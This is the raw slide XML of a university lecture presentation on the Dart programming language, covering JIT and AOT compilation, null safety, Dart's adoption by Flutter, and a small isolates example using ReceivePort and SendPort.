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Roboto"/>
      <p:regular r:id="rId41"/>
      <p:bold r:id="rId42"/>
      <p:italic r:id="rId43"/>
      <p:boldItalic r:id="rId44"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mon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9" roundtripDataSignature="AMtx7mgOtzjxXrkT4o2UaaeZxULXeU9EZ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Panayiotis Liotati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RobotoMono-bold.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMon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RobotoMono-boldItalic.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.fntdata"/><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11-30T17:41:16.133">
    <p:pos x="6000" y="0"/>
    <p:text>This means that the source code or bytecode is converted into executable code just when it is needed, which is "just in time" for execution.</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo timeZoneBias="0"/>
      </p:ext>
      <p:ext uri="http://customooxmlschemas.google.com/">
        <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" commentPostId="AAABBjpxVWA"/>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11-30T17:52:53.398">
    <p:pos x="196" y="280"/>
    <p:text>Release Builds: AOT is used for creating release builds in Flutter. While developers use JIT during development for its hot reload capabilities, they switch to AOT for the final product to achieve optimized performance.</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo timeZoneBias="0"/>
      </p:ext>
      <p:ext uri="http://customooxmlschemas.google.com/">
        <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" commentPostId="AAABBjpxVWE"/>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3-11-30T18:05:31.054">
    <p:pos x="196" y="515"/>
    <p:text>Error Prevention: Reduces the likelihood of null reference errors at runtime, as the compiler catches potential errors at compile time.
Code Quality: Helps in writing cleaner, more robust code. Null safety encourages developers to think about nullability during the design phase.
Performance: Null safety can lead to better performance. The Dart compiler can produce more optimized code when it knows certain variables can't be null.
API Clarity: It becomes clear which variables or return types are expected to be nullable and which are not, improving the readability and maintainability of the code.</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo timeZoneBias="0"/>
      </p:ext>
      <p:ext uri="http://customooxmlschemas.google.com/">
        <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" commentPostId="AAABBjpxVWM"/>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3-11-30T20:39:40.335">
    <p:pos x="509" y="866"/>
    <p:text>Integrated in Build Process: In a typical development workflow, especially when using frameworks like AngularDart or when building web applications with Flutter, the dart2js process is integrated into the build system, and the developer doesn't need to run it manually.</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo timeZoneBias="0"/>
      </p:ext>
      <p:ext uri="http://customooxmlschemas.google.com/">
        <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" commentPostId="AAABBjpxVXU"/>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a0d279bb21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a0d279bb21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a0d279bb2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a0d279bb2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a0d279bb2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a0d279bb2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a0d279bb21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a0d279bb2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a0d279bb21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a0d279bb21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ec521e070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ec521e070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a0d279bb2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a0d279bb2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a0d279bb21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a0d279bb21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a0d279bb21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a0d279bb21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a0d279bb21_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a0d279bb21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a0d279bb21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a0d279bb21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a0d279bb2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2a0d279bb2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a0d279bb2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a0d279bb2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a0d279bb2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a0d279bb2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a0d279bb21_1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a0d279bb21_1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a0d279bb2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a0d279bb2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a0d279bb2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a0d279bb2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a0d279bb21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a0d279bb21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a0d279bb21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a0d279bb21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a0d279bb21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a0d279bb21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a0d279bb21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2a0d279bb21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2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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8485336" y="458609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8" name="Google Shape;18;p2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 name="Google Shape;19;p2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 name="Google Shape;2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2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2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2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1" name="Google Shape;31;p2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2" name="Google Shape;3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2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5" name="Google Shape;35;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 name="Shape 36"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Google Shape;37;p2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38" name="Google Shape;3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9" name="Shape 39"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;40;p3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1" name="Google Shape;41;p3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2" name="Google Shape;42;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1.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1.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p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId1">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7084935" y="0"/>
            <a:ext cx="2059064" cy="792600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="A picture containing text&#10;&#10;Description automatically generated" id="10" name="Google Shape;10;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4460930"/>
            <a:ext cx="710577" cy="68097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drive.google.com/file/d/1iT3HyyiYdzw5HgYEIaJu2TNTUUg8nLGe/view" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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omments" Target="../comments/commen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
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524708" y="2716513"/>
            <a:ext cx="8222100" cy="43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sz="1600"/>
              <a:t>Μάθημα ΕΠΛ421: Προγραμματισμός Συστημάτων</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>Χειμερινό Εξάμηνο 2023</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Google Shape;50;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524708" y="3489730"/>
            <a:ext cx="8222100" cy="1322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sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Kyriakos Demetriou</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Panayiotis Liotatis</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;51;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8485336" y="458609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descr="Logo&#10;&#10;Description automatically generated" id="52" name="Google Shape;52;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852066" y="117402"/>
            <a:ext cx="5388633" cy="28155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9">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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="654703"/>
            <a:ext cx="5619214" cy="1020674"/>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GB"/>
              <a:t>Adaptation of Dart</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857251" y="1749022"/>
            <a:ext cx="3836859" cy="2739776"/>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GB"/>
              <a:t>Initially intended as an alternative of JavaScript, but it was never adopted by the web development community</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Embraced by the Flutter framework in 2017</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="A logo with blue triangles&#10;&#10;Description automatically generated" id="117" name="Google Shape;117;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6265115" y="3019387"/>
            <a:ext cx="2387746" cy="11938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Dart Isolates: Dart's Threads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857251" y="1749019"/>
            <a:ext cx="4735830" cy="2675339"/>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In Dart, all code runs in containers called ‘Isolates’.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Main Isolate is created on program start</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Separate memory on each Isolate</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>More Isolates can be added for asynchronous event management and multi threaded execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="A screen shot of a phone&#10;&#10;Description automatically generated" id="124" name="Google Shape;124;p7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6261511" y="969645"/>
            <a:ext cx="2357438" cy="3143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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5298676" y="496151"/>
            <a:ext cx="3143249" cy="591969"/>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SzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Isolates Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1391437" y="94944"/>
            <a:ext cx="3593637" cy="4708550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>import 'dart:isolate';</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>void startIsolate() async {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  ReceivePort receivePort = ReceivePort();</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  Isolate isolate = await Isolate.spawn(runIsolate, receivePort.sendPort);</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  receivePort.listen((data) {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>    print('Data from isolate: $data');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  });</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>void runIsolate(SendPort sendPort) {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  var msg = 'Hello from isolate';</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  sendPort.send(msg);</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>void main() {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  startIsolate();</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Google Shape;131;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5468990" y="1239511"/>
            <a:ext cx="2715571" cy="3142720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-214313" lvl="0" marL="214313" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Library: import dart:isolate</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-214313" lvl="0" marL="214313" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Receive port: Get messages from isolates</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-214313" lvl="0" marL="214313" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
